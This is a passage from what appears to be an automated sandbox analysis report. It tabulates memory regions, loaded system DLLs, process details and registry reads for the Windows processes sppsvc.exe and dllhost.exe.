|
|
|
- |
| userdataplatformhelperutil.dll | 0x7ffaded00000 | 0x7ffaded15fff | Memory Mapped File | rwx |
|
|
|
- |
| networkhelper.dll | 0x7ffaded20000 | 0x7ffaded36fff | Memory Mapped File | rwx |
|
|
|
- |
| aphostservice.dll | 0x7ffadee50000 | 0x7ffadee9dfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatimeutil.dll | 0x7ffae5a20000 | 0x7ffae5a40fff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x7ffae81b0000 | 0x7ffae81f7fff | Memory Mapped File | rwx |
|
|
|
- |
| inproclogger.dll | 0x7ffae84e0000 | 0x7ffae84ecfff | Memory Mapped File | rwx |
|
|
|
- |
| tokenbroker.dll | 0x7ffae8760000 | 0x7ffae8825fff | Memory Mapped File | rwx |
|
|
|
- |
| mccspal.dll | 0x7ffae89d0000 | 0x7ffae89dafff | Memory Mapped File | rwx |
|
|
|
- |
| dsclient.dll | 0x7ffae8ad0000 | 0x7ffae8adbfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatypehelperutil.dll | 0x7ffae8ae0000 | 0x7ffae8af0fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffae8b60000 | 0x7ffae8fc9fff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x7ffaeb090000 | 0x7ffaeb371fff | Memory Mapped File | rwx |
|
|
|
- |
| idstore.dll | 0x7ffaecf40000 | 0x7ffaecf66fff | Memory Mapped File | rwx |
|
|
|
- |
| aphostclient.dll | 0x7ffaed180000 | 0x7ffaed18ffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffaedb10000 | 0x7ffaede85fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffaef620000 | 0x7ffaef6f5fff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x7ffaf0a90000 | 0x7ffaf0aabfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffaf0de0000 | 0x7ffaf0f10fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ffaf1b70000 | 0x7ffaf1b87fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffaf37e0000 | 0x7ffaf3811fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| msv1_0.dll | 0x7ffaf3c40000 | 0x7ffaf3c9efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptdll.dll | 0x7ffaf3e50000 | 0x7ffaf3e63fff | Memory Mapped File | rwx |
|
|
|
- |
| ntlmshared.dll | 0x7ffaf4170000 | 0x7ffaf417afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #77: sppsvc.exe
131
0
| Information | Value |
|---|---|
| ID | #77 |
| File Name | c:\windows\system32\sppsvc.exe |
| Command Line | C:\Windows\system32\sppsvc.exe |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf74 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
990
0x
95C
0x
F8C
0x
F84
0x
F78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000004a5ba10000 | 0x4a5ba10000 | 0x4a5ba16fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000004a5ba20000 | 0x4a5ba20000 | 0x4a5ba2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000004a5ba30000 | 0x4a5ba30000 | 0x4a5ba43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000004a5ba50000 | 0x4a5ba50000 | 0x4a5bacffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5bad0000 | 0x4a5bad0000 | 0x4a5bbcffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x4a5bbd0000 | 0x4a5bc8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000004a5bc90000 | 0x4a5bc90000 | 0x4a5bd0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5bd10000 | 0x4a5bd10000 | 0x4a5bd16fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000004a5bd20000 | 0x4a5bd20000 | 0x4a5bea7fff | Pagefile Backed Memory | r |
|
|
|
- |
| sppsvc.exe.mui | 0x4a5beb0000 | 0x4a5beb5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000004a5bec0000 | 0x4a5bec0000 | 0x4a5bec0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5bed0000 | 0x4a5bed0000 | 0x4a5bedffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000004a5bee0000 | 0x4a5bee0000 | 0x4a5c060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000004a5c070000 | 0x4a5c070000 | 0x4a5c12ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000004a5c130000 | 0x4a5c130000 | 0x4a5c130fff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5c140000 | 0x4a5c140000 | 0x4a5c14ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5c150000 | 0x4a5c150000 | 0x4a5c15ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5c160000 | 0x4a5c160000 | 0x4a5c1dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5c1e0000 | 0x4a5c1e0000 | 0x4a5c2dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5c2e0000 | 0x4a5c2e0000 | 0x4a5c35ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000004a5c360000 | 0x4a5c360000 | 0x4a5c3dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x4a5c3e0000 | 0x4a5c716fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff160000 | 0x7df5ff160000 | 0x7ff5ff15ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff62a750000 | 0x7ff62a750000 | 0x7ff62a84ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff62a850000 | 0x7ff62a850000 | 0x7ff62a872fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff62a875000 | 0x7ff62a875000 | 0x7ff62a876fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62a877000 | 0x7ff62a877000 | 0x7ff62a878fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62a879000 | 0x7ff62a879000 | 0x7ff62a879fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62a87a000 | 0x7ff62a87a000 | 0x7ff62a87bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62a87c000 | 0x7ff62a87c000 | 0x7ff62a87dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff62a87e000 | 0x7ff62a87e000 | 0x7ff62a87ffff | Private Memory | rw |
|
|
|
- |
| sppsvc.exe | 0x7ff62b6c0000 | 0x7ff62bcedfff | Memory Mapped File | rwx |
|
|
|
- |
| webservices.dll | 0x7ffadf150000 | 0x7ffadf2cafff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| clipc.dll | 0x7ffaf04b0000 | 0x7ffaf04c5fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptxml.dll | 0x7ffaf04d0000 | 0x7ffaf04f1fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
Registry (131)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-38 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-39 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-40 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-41 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-42 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-43 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9 | - |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-38 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-39 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-40 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-41 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-42 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-43 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9 | type = REG_BINARY |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 |
Process #78: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #78 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:04:20, Reason: Self Terminated |
| Monitor Duration | 00:00:38 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x938 |
| Parent PID | 0x240 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
908
0x
544
0x
24C
0x
B30
0x
E54
0x
6E0
0x
AB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000f303b00000 | 0xf303b00000 | 0xf303b0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f303b10000 | 0xf303b10000 | 0xf303b16fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f303b20000 | 0xf303b20000 | 0xf303b33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f303b40000 | 0xf303b40000 | 0xf303c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f303c40000 | 0xf303c40000 | 0xf303c43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f303c50000 | 0xf303c50000 | 0xf303c51fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f303c60000 | 0xf303c60000 | 0xf303d5ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xf303d60000 | 0xf303e1dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f303e20000 | 0xf303e20000 | 0xf303f1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f303f20000 | 0xf303f20000 | 0xf303f20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f303f30000 | 0xf303f30000 | 0xf303f36fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f303f40000 | 0xf303f40000 | 0xf303f40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f303f50000 | 0xf303f50000 | 0xf30404ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f304050000 | 0xf304050000 | 0xf304050fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f304060000 | 0xf304060000 | 0xf304060fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f304070000 | 0xf304070000 | 0xf304072fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f304090000 | 0xf304090000 | 0xf304091fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f304100000 | 0xf304100000 | 0xf30410ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f304110000 | 0xf304110000 | 0xf30411ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xf304120000 | 0xf304456fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f304460000 | 0xf304460000 | 0xf30455ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f304560000 | 0xf304560000 | 0xf30465ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f304660000 | 0xf304660000 | 0xf30475ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f304760000 | 0xf304760000 | 0xf3048e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f3048f0000 | 0xf3048f0000 | 0xf304a70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f304a80000 | 0xf304a80000 | 0xf305e7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f305e80000 | 0xf305e80000 | 0xf305f7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff820000 | 0x7df5ff820000 | 0x7ff5ff81ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff63d80e000 | 0x7ff63d80e000 | 0x7ff63d80ffff | Private Memory | rw |
|
|
|
- |
